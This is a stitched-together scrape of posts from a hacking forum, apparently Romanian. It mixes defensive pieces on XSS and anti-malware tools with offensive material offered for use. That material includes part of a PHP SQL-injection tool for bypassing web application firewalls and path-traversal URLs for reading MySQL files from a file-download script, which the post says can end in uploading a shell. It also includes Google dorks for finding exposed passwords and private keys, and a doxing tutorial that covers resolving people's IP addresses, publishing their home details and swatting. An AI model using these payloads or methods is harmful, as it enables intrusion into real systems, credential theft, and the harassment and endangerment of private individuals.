20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style> <html> <head><title>T3N38R15 Injector for WAF Bypass</title></head> <body> <b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b> <form method="post"> <input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit"> <input type="hidden" name="opt1" value="1"></form> </br> Greets to Team M4DL33Ts </body> </html> <?php } function GetSeperatorByInteger($int){ switch($seperator){ case '1':return '1"'; case '2':return '1' . chr(39); case '3':return '1'; } return ''; } function String2Hex($string){ $hex=''; for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return $hex; } function Hex2String($hex){ $string=''; for ($i=0; $i < strlen($hex)-1; $i+=2){ $string .= chr(hexdec($hex[$i].$hex[$i+1])); } return $string; } function LoadSite($url, $postdata){ $agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"; $ch = curl_init($url); if ($ch){ curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_USERAGENT, $agent); curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1); if (isset($postdata)){ curl_setopt($ch,CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);} $tmp = curl_exec ($ch); curl_close ($ch); } return $tmp; } ?> Credits to : T3N38R15
-
@Che nu, este windows 7
-
Acum am vazut si mi s-a parut destul de amuzant
-
"De unde bani sefu'?" oricum sa foloseasca camera unei gradinite... Au vrut sa isi faca reclama fara prea multe cheltuieli la ce te asteptai?
-
VirusTotal: http://www.virustotal.com/ Virus.org Rogue File Scanning Service: http://scanner.virus.org/ Jotti’s Malware Scan 2.99: Jotti's malware scan Dr. Web AntiVirus: Dr.Web ® online check Kaspersky File Scanner: Free Tools | Kaspersky Lab avast! Online scanner: http://onlinescan.avast.com VirusChief: http://www.viruschief.com/index.html VirSCAN.org: VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 39 AntiVirus Engines! NoVirusThanks: http://vscan.novirusthanks.org/ nodistribute: https://nodistribute.com/
-
Firemonkey Premium Styles (XE6) Usage Tutorial + Premium Styles
Aerosol posted a topic in Free stuff
Premium Firemonkey Skins Download: Firemonkey Premium Styles XE6 -
Table of Contents............................................................................................. 2 1. Introduction................................................................................................. 5 1.1 About the Course and Notes ............................................................................5 1.2 Definitions......................................................................................................5 1.3 Typical Examples ............................................................................................6 1.3.1 Hacking ...................................................................................................7 1.3.2 Hiding Information from Public ..................................................................7 1.3.3 Cell Phones ............................................................................................ 10 1.3.4 Computer Applications ............................................................................ 10 1.4 Requirements............................................................................................... 12 1.5 Scope .......................................................................................................... 13 1.6 Ethics .......................................................................................................... 13 1.7 Miscellaneous Information ............................................................................. 14 2. Programming Processors ........................................................................... 16 2.1 Programming Languages............................................................................... 16 2.2 Processor Arithmetic ..................................................................................... 18 2.3 Memory Structure......................................................................................... 22 2.3.1 Variables................................................................................................ 23 2.3.2 Unicode Strings ...................................................................................... 24 2.3.3 Pointers ................................................................................................. 24 3. Windows Anatomy..................................................................................... 26 3.1 Windows API................................................................................................ 26 3.2 File System .................................................................................................. 27 3.3 File Anatomy ................................................................................................ 28 3.3.1 File Header............................................................................................. 29 3.3.2 Into PE Format....................................................................................... 31 3.3.3 The PE Header ....................................................................................... 34 3.3.4 Section Table ......................................................................................... 43 3.3.5 Commonly Encountered Sections ............................................................. 51 3.3.6 PE File Imports....................................................................................... 59Table of Contents 3 3.3.7 PE File Exports ....................................................................................... 62 4. Basic Concepts of Assembly....................................................................... 67 4.1 Registers...................................................................................................... 67 4.2 Flag............................................................................................................. 70 4.3 Memory ....................................................................................................... 71 4.4 Stacks.......................................................................................................... 73 4.5 Interrupts .................................................................................................... 74 5. Assembly Commands ................................................................................. 76 5.1 CMP: Compare Two Operands ....................................................................... 76 5.1.1 Description............................................................................................. 76 5.1.2 Operation............................................................................................... 76 5.1.3 Opcode Instruction Description ................................................................ 77 5.2 J cc: Jump if Condition Is Met........................................................................ 77 5.2.1 Description............................................................................................. 77 5.2.2 Operation............................................................................................... 79 5.2.3 Opcode Instruction Description ................................................................ 79 5.3 PUSH: Push Word or Doubleword Onto the Stack ............................................ 81 5.3.1 Description............................................................................................. 81 5.3.2 Operation............................................................................................... 82 5.3.3 Opcode Instruction Description ................................................................ 83 5.4 POP: Pop a Value from the Stack ................................................................... 84 5.4.1 Description............................................................................................. 84 5.4.2 Operation............................................................................................... 85 5.4.3 Opcode Instruction Description ................................................................ 88 5.5 AND: Logical AND......................................................................................... 88 5.5.1 Description............................................................................................. 88 5.5.2 Operation and Example........................................................................... 88 5.5.3 Opcode Instruction Description ................................................................ 89 5.6 NOT: One's Complement Negation ................................................................. 90 5.6.1 Description............................................................................................. 90 5.6.2 Operation and Example........................................................................... 90 5.6.3 Opcode Instruction Description ................................................................ 90Table of Contents 4 5.7 OR: Logical Inclusive OR ............................................................................... 91 5.7.1 Description............................................................................................. 91 5.7.2 Operation and Example........................................................................... 91 5.7.3 Opcode Instruction Description ................................................................ 92 5.8 XOR: Logical Exclusive OR............................................................................. 92 5.8.1 Description............................................................................................. 92 5.8.2 Operation and Example........................................................................... 92 5.8.3 Opcode Instruction Description ................................................................ 93 5.9 Other instructions ......................................................................................... 94 5.9.1 CALL: Call Procedure............................................................................... 94 5.9.2 ADD: Add............................................................................................... 99 5.9.3 SUB: Subtract......................................................................................... 99 5.9.4 MUL: Unsigned Multiply........................................................................... 99 5.9.5 DIV: Unsigned Divide............................................................................ 100 5.9.6 MOV: Move .......................................................................................... 100 6. SoftIce for Windows ................................................................................ 103 6.1 Installing SoftIce ........................................................................................ 103 6.2 Configuring SoftIce ..................................................................................... 105 6.2.1 Resizing Panels..................................................................................... 105 6.2.2 Panels.................................................................................................. 106 6.2.3 Other Useful Settings ............................................................................ 107 6.2.4 SoftIce Window.................................................................................... 107 6.2.5 Symbols............................................................................................... 108 6.3 Breakpoints................................................................................................ 109 6.3 Useful Functions ......................................................................................... 112 6.4 Navigation in SoftIce................................................................................... 112 7. Hackman Editor ....................................................................................... 114 7.1 String Manipulation..................................................................................... 114 7.2 Version Stamp............................................................................................ 116 7.3 Date Stamp................................................................................................ 117 7.4 Icon Resources........................................................................................... 118 7.5 Other Tools................................................................................................ 119 Link: here
-
Explaining Cross-Site Scripting Cross-site scripting (XSS) vulnerabilities are the most prevalent vulnerability in Web applications. XSS bugs arise when Web applications take data from users and dynamically include it in Web pages without first properly validating the data. Also known as script injection or HTML injection vulnerabilities, XSS vulnerabilities allow an attacker to execute arbitrary commands, written in JavaScript for example, and display arbitrary content in a victim user's browser. A successful XSS attack leads to an attacker controlling the victim’s browser or account on the vulnerable Web application. Although XSS is enabled by vulnerable pages in a Web application, the victims of an XSS attack are the application's users, not the application itself. The potency of an XSS vulnerability lies in the fact that the malicious code executes in the context of the victim's session, allowing the attacker to bypass normal security restrictions. Consider the above form used to reset a password along with its accompanying ASP.NET code. When an invalid email address is entered, it is reflected back to the user as part of an error message. Notice what happens when data that is in the wrong format is entered. Select your entry from the drop-down menu, and click Submit. Categories of Cross-site Scripting There are three main categories of cross-site scripting vulnerabilities: reflective, persistent, and DOM-based. 1)Reflective—Reflective cross-site scripting vulnerabilities occur when a Web application reflects part of an HTTP request back to the user without first sanitizing it. A common way this happens is when the malicious code is included as a GET or POST parameter. In order for an attacker to exploit a reflective XSS vulnerability, the attacker must somehow entice a victim into initiating the request from his or her own browser, for example, by clicking on a malicious link in an email. 2)Persistent—Persistent cross-site scripting vulnerabilities occur when a Web application stores user-generated data and then later displays this data back to the users of the application. This is common for many Web applications such as wikis, online forums, and social networking sites. If this data is not properly sanitized before being displayed in the client browser, then any user of the application can potentially become a victim. Persistent cross-site Scripting vulnerabilities are more dangerous than reflective ones since the attacker does not have to entice other users of the Web application into performing any suspicious actions. 3)DOM-based—DOM-based cross-site scripting vulnerabilities usually affect applications that perform client-side processing of user input using JavaScript or VBScript. Many applications nowadays rely on pages that contain client-side scripts that dynamically generate HTML content. Based on certain user input, these pages modify their HTML without any interaction with the server. A DOM-based XSS exists when it is possible for an attacker to inject a malicious script through such a page without submitting any data to the server. This time, unlike for other types of XSS, it is the client-side script that is responsible for not properly sanitizing the user input, rather than the server. Although they are less common, these vulnerabilities will become more frequent, as an increasing number of applications push their processing logic to the client browser in an attempt to minimize HTTP traffic. Reflective versus Persistent Cross-site Scripting 1)ReFlective XSS:- There are many ways in which an attacker can entice a victim into initiating a reflective XSS request. For example, the attacker could send the victim a misleading email with a link containing malicious JavaScript. If the victim clicks on the link, the HTTP request is initiated from the victim's browser and sent to the vulnerable Web application. The malicious JavaScript is then reflected back to the victim's browser, where it is executed in the context of the victim user's session. 2)Persistent XSS:- Consider a Web application that allows users to enter a user name which is displayed on each user’s profile page. The application stores each user name in a local database. A malicious user notices that the Web application fails to sanitize the user name field and inputs malicious JavaScript code as part of their user name. When other users view the attacker’s profile page, the malicious code automatically executes in the context of their session. Identifying the Impact of Cross-site Scripting Through successful cross-site scripting, an attacker can gain access to the HTML Document Object Model (DOM) that the browser generates for the vulnerable site. This allows an attacker to significantly control the user's browser and to perform various malicious attacks. Some of the more common ones include: 1)Altering the response HTML. Since the malicious code executes in the context of the victim user’s session, it has access to all the DOM elements on the page that is affected by the XSS vulnerability. By altering the DOM, elements of the Web page can be hidden or removed, and new elements can be added, effectively modifying the appearance of the page. 2)Hijacking Sessions. An attacker can execute any client-side code, such as JavaScript, within the browser, which allows the attacker to access the victim user’s session token stored in a cookie. This can enable the attacker to hijack the victim’s session on the vulnerable application. 3)Instantiating ActiveX Controls. An attacker can manipulate ActiveX controls to gain greater access to a victim user’s local machine than is normally allowed. Note that ActiveX components typically require user approval before running. 4)Performing Background HTTP requests. An attacker can cause the victim user to make requests to other pages within the Web application, to other unrelated Web applications, and even to applications located behind the victim’s firewall. Such requests can occur without the victim knowing about them. 5)Arbitary Code Execution. The attacker can inject exploits targeted at unpatched vulnerabilities in Web browsers and their plugins. Implementing Input Validation Input that is expected to be within a certain format should be validated by an application and consequently accepted, filtered, or rejected. When performing input validation, developers generally have to choose between using a black-list or a white-list approach. 1)Black-Lists. When using a black-list approach, a list of inputs that are considered dangerous is created. Dangerous input is then filtered or rejected when found. It may seem simpler to enumerate all the insecure inputs instead of the known secure ones. However, with this approach the list of dangerous inputs for a given application has to be constantly updated as the application evolves and new attacks are discovered. If a single insecure input is forgotten, then the security of the application can be compromised. 2)White-List. In a white-list approach, a list of known good inputs is used instead. Input that does not match what is in the list will be filtered or rejected. This approach is more secure than using black-lists, but the downside is that good inputs might be blocked unintentionally. 3)Filtering and rejecting. Once input has been categorized as bad, the application can either filter or reject it. Input filtering happens when the application accepts dangerous input and transforms it, for example by removing dangerous characters, so that it does not cause any harm. Input filtering is tricky to get right, and a flaw might allow an attacker to craft input that manages to exploit the application after being filtered. As a result, rejecting dangerous input is generally more secure, but can also be less user-friendly. 4)Client Validation. Web applications follow a client-server model, and, as a result, input checking can be done on the client browser and/or on the server. The client-side input checks run in a different system, so it is important to keep in mind that they can be bypassed. For example, it is simple to disable JavaScript in a browser and use it to submit invalid data to the server. As a result, any security-related input validation should be performed by the server, even if it is duplicated client-side. Implementing Output Encoding It is important to properly encode all user-controlled data before it is outputted to a dynamically generated Web page. If data is not encoded then it will make its way to the browser in its original representation, which could be executable script code, causing the browser to interpret and run it. The most common case is of user-controlled input making its way into plain HTML; in this case it should be HTML-encoded before being inserted into the page. HTML-encoding can be performed using ASP.NET's HttpUtility.HtmlEncode. You should, however, carefully consider other locations, such as dynamic JavaScript, into which data can be outputted, and select an appropriate encoding method. As an example, consider an attacker submitting the following attack string to an application: <script>alert(document.cookie)</script> If this input was processed by an application and not properly encoded before being displayed, an attacker would be able to perform cross-site scripting attacks. If the application HTML-encoded this input before displaying it, then the previous attack string would be rendered harmless and would look like: <script>alert(document.cookie)</script> You should consider using Microsoft’s Anti-XSS library, which offers a more robust HttpUtility.HtmlEncode and other methods for different encodings. This library differs from most encoding libraries in that it uses the principle of inclusions to provide protection against cross-site scripting attacks. The library first defines a set of acceptable characters, and then encodes anything outside this set, including invalid characters and characters that could be used in an attack. The principle of inclusions approach provides a high degree of protection against cross-site scripting attacks. Encode the Output! Consider the following form used to reset a password along with its accompanying ASP.NET code. Use the top drop-down menu to specify the means through which data is presented to the user. Use the bottom drop-down menu to select the input to the application. Notice how different encoding schemas are applied when data in the wrong format is entered. Credit's to : KaMmi
-
Hi RST, today i want introduce one of my new methods to gain with a lfd a database who is on localhost. at first we need to know that we normally cant access dbs from the www on the server so we cant connect to them but what if we want a wp-login ? at first we grab the config folder. http://example.com/download.php?file=config.php then we can read the Config file the interesting thing about that is the Database name LINUX METHOD : but we need to know if it is vuln so we can try something like that : http://example.com/download.php?file=../../../var/lib/mysql/ibdata1 this only work on InnoDB Smile if there come some result then it is vuln Smile or if you do that : http://example.com/download.php?file=../../../etc/my.cnf http://example.com/download.php?file=../../../etc/mysql/my.cnf and in the file stand something like that : default-storage-engine= then it is vuln too. if we gain it the we can read the mysql db as file like that : /var/lib/mysql/YOURDBNAME/YOURTABLENAME.frm we know the DBname and we know the table ( wp_users for Wordpress Users), then we need just to try some of the file ending /var/lib/mysql/YOURDBNAME/wp_users.frm /var/lib/mysql/YOURDBNAME/wp_users.myd /var/lib/mysql/YOURDBNAME/wp_users.myi /var/lib/mysql/YOURDBNAME/wp_users.ibd WINDOWS/XAMPP METHOD : http://example.com/download.php?file=../mysql/data/YOURDBNAME/YOURTABLENAME.ibd if we are lucky we have file-rights and we can read the database and can login into the Wordpress site and upload a shell. credits to : T3N38R15
-
I found this tutorial on google Step 1: Organizing The first step to a great dox is organization. I don't recommend making a template as you go, create your own or look for templates on the internet. I recommend making your own the fits your doxing style. When doxing, I like to open two different word processing windows. I prefer notepad and notepad++. The first window will be for unorganized information, just paste everything you have about your target into it. This will serve as a reference later. The next windows will be for the actual dox. This will be where you paste your template and information when you have gathered all the necessary info. Step 2: Gathering Information The next step is gathering the information. There are many different ways to do this because when you are doxing, every bit of starting information can be different. You may have a Skype name, a name, social networking account, minecraft account, etc. I will be only going over a few of these. Skype- If the targets first name is in their Skype, paste in into your document and continue. Next go to a Skype resolver website such as http://fastgrab.biz or any other preferred website. Once you have their IP Address, enter it into a site such as IP Locator | Locate Network Address on Google Map | Internet Protocol Tools or Whois Lookup, Domain Availability & IP Search - DomainTools. I have used both of these websites with great results. Paste the City, State, Zip, etc into your unorganized document. Social Networking/Name- When you have a name, it can be difficult. First go on a website that searches first and last names. My preferred website for this is Whitepages – Find People, Businesses & More. Now that you have this, you may find neighbors, relatives, friends, home address, etc. Paste the information into your unorganized window. Please note that some people are minors and their name will not be registered on sites such as WhitePages. A little method I have used all throughout my doxing is something I do when doing google searches. Simply put the social networking platform you want to find them on, with a colon and their name. Here are a few examples: Skype:Juan.Juan Facebook:Juan.Juan Twitter:John.Smith IGN:ThisIsAMinecraftAccount You get the idea. This method works very well, but please note when dealing with twitter, facebook, instagram, etc, bing is a good search engine to use. Bing works well with social networking, where as google works well with Skype, Steam, IGN's, etc. Step 3: Organizing The Information This part is easy, take all the information you have found, and paste it into an organized template. When doxing, uploading unorganized information is frowned upon. Find or make a dox that looks nice and is easy to read. A good site for finding doxes/doxing templates is Pastebin.com - #1 paste tool since 2002!. Step 4: Using the Dox A dox can be used in many different ways. Several of which are illegal and may get you into serious trouble. The first way is to use the dox as a defense. Let's make a situation up and say that someone is DDoSing you. Give them little bits of information at a time until they slowly back off. The next way is to completely tear apart your target. You can upload the dox to websites and send the target the link. WARNING: This is illegal when dealing with minors, and may get you into serious trouble. I am not responsible for misuse or your stupidity. The next few methods I do not recommend, and I will not provide a tutorial on. If you wish to pursue these methods, simply do a google search for a tutorial. These methods are Swatting, sending mass pizzas, sending mass UPS boxes, etc. You can also call their ISP and report them for different things of your choice. Note: Some people are nearly impossible to dox, you won't be able to find any information. In this case, use Social Engineering to find out things. I will not be covering Social Engineering in this tutorial, but it isn't hard to do in this case. Simply add the target, pretend to be friends with them, and slowly gather information. Tip: Don't be pushy, never ask what is your full name right away, this will give you away and ruin your chance of a successful dox. Tip: If you are having trouble resolving them, catch them at a time when they do not have a VPN on, and see my earlier post on IP-Logging!
-
Prerequisites: (This one is Easy!) 1. A modern webbrowser and a internet. 2. Time Method 1: Facebook! We will be using a google dork to find usernames and passwords of many accounts including Facebook! The Dork: intext:charset_test= email= default_persistent= Enter that into Google, and you will be presented with several sites that have username and passwords lists! Method 2: WordPress! This will look for WordPress backup files Which do contain the passwords, and all data for the site! The Dork: filetype:sql inurl:wp-content/backup-* Method 3: WWWBoard! This will look for the user and passwords of WWWBoard users The Dork: inurl:/wwwboard/passwd.txt Method 4: FrontPage! This will find all users and passwords, similar to above. The Dork: ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" Method 5: Symfony! This finds database information and logins The Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -source -repository Method 6: TeamSpeak! (big one!!!!!) This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!) The Dork: server-dbs "intitle:index of" Method 7: TeamSpeak2!!! (also big!) This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:" The Dork: "inurl:Teamspeak2_RC2/server.log" Method 8: Get Admin pass! Simple dork which looks for all types of admin info The Dork: "admin account info" filetype:log Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys. The Dork: filetype:pem pem intext:private And the Ultimate one, the regular directory full of passwords.... Method 10: The Dir of Passwords! Simple one! The Dork: intitle:"Index of..etc" passwd All credits to ME TechLab
-
Everyone has had it, being infected by a keylogger, a rat, or another type of malware. It isn't fun is it? Now how will we protect ourselfs, IF we get infected again? Well I am here to help you! Read carefully, set everything up, and if you get infected you are the first to know! * Comodo A lot of you people probably know this software, have it installed, or have another AV. Well I personally like COMODO the best, because it pops up on every program you run, to ask if you are sure etc. I like this feature because if you click something by accident you can still block it. It also has a perfect firewall and a virus scanner inbuilt. You can have all these services free! Link - http://www.comodo.com/ * Preview: * KeyScrambler Next is a keyscrambler! Always have your keystrokes encrypted, because if comodo fails you will always have your keystrokes encrypted, you will have no problem logging in on paypal as the logger will not register any data. Also this has a free version and a paid one! Link - QFX Software - Download KeyScrambler * Preview(s): * Zemana AntiLogger This is seriously the best software you can download to go against infections. If you get infected by a FUD rat, COMODO fails to deliver this will STILL stop the rat, even if it is FUD. It will block any attempts to connect with your webcam, it will block the ability to show your screen to the rat. It will locate the RAT and it is possible to remove the RAT entirely with this software! Only problem is this software is buy only! Link - Zemana AntiLogger - The #1 Privacy Protection Software * Preview: * Malwarebytes This is one of the most advanced Anti-Malwares scanner ever. If you use this in combination with COMODO no RAT, Keylogger or what so ever can pass through. Link - Malwarebytes | Free Anti-Malware & Internet Security Software * Preview: * Malwarebytes Anti-Exploit This will protect you to all forms of exploits, including 0 day exploits, this includes the "newly" released .doc exploits and .pdf exploits. This is a truly amazing addition to your security. Run this once and it will protect you and you will have to do nothing! Link - Malwarebytes | Malwarebytes Anti-Exploit - Free Zero-Day Exploit Protection * Preview: * Sandboxie This piece of software will save your life over and over again! Need to test a RAT? Run it sandboxed! it can't go anywhere, found a program online, but don't know if it is a virus? Run it sandboxed and find out! Link - Sandboxie - Sandbox software for application isolation and secure Web browsing * Preview: Congratulations! Your computer is now totally Virus proof! You have 2 keyboard Encrypters, Anti-Webcam, Anti-ScreenShare, Anti-FileTransfer, basically anti all the rats features. You also have an antivirus a firewall and a backup for opening unwanted programs. Credits to: Pak3ts
-
Memory Alignment is very useful for performance in processors, if data is aligned to a certain boundary, then larger chunks of data can be accessed much more efficiently rather than lots of small accesses with a large chunk of data. Data misalignment is a common problem with debugging, especially with x64 processors. We can check for alignment issues by checking the EFLAGS register and AC flag, which when set to 1, will mean that data being accessed must be aligned to the correct boundary otherwise you'll experience access violations and potential BSODs.On the other hand, using malloc or new should always create aligned data accesses. Supposedly, the interrupt handler is assigned the 17h vector number within the IDT table. Now, lets move onto the concept of a try-except block, and the Probe. The Memory Probe has to reside within the try-except block to be able to raise the appropriate exception code to the operating system. The two versions of Memory Probes are the ProbeForRead and ProbeForWrite. Memory Probes can't be used within the Kernel Mode Address Range otherwise it will lead to an exception. The try-except block is a block of code which tested to see if it will run properly, and if it doesn't then a exception handler will be invoked. I've created a very quick template for a try-except block which will catch all exceptions regardless of their type, in real programs you'll most likely have specific handlers for exception errors. Typically, inside the catch block, the code will producing a error message to the user. The try block is the code we're attempting to execute with no problems. The ProbeForRead function takes three parameters: the starting address of the buffer, the length of the buffer and the required alignment. Memory Probes are used within the win32k.sys subsystem (Kernel-Mode) when dealing with System Calls from User-Mode and storing certain libraries within User-Mode. The Win32k.sys has it's own SSDT called the Shadow SSDT. Source: link.
-
Pentru utilizatori de windows 7 Tutoriale Video
-
Am dat pe google din intamplare de acest site. Check it : Hash Cracker Mail Service Mass hash generator Mass base64 Encoded & Decoded Tool's CyberAoN - Hash Cracker - Ver. 2.0
-
UnHackMe aims to find and remove Google Search redirects, rootkits, trojans, backdoors, viruses, worms, adware, spyware, keyloggers, unwanted programs, etc. from your computer. UnHackMe works alongside most traditional anti-virus and anti-malware software. This giveaway has no free program updates or free tech support, must be installed during giveaway time period, and is for home/personal use only. Get UnHackMe with free lifetime upgrades if you want UnHackMe with Warrior (a bootable rescue CD/DVD/USB), free updates, free tech support, business + home use, and ability to install/reinstall whenever you want. Sale ends in 1 day 18 hrs 58 mins Free UnHackMe (100% discount) | Daily giveaways and discounts | SharewareOnSale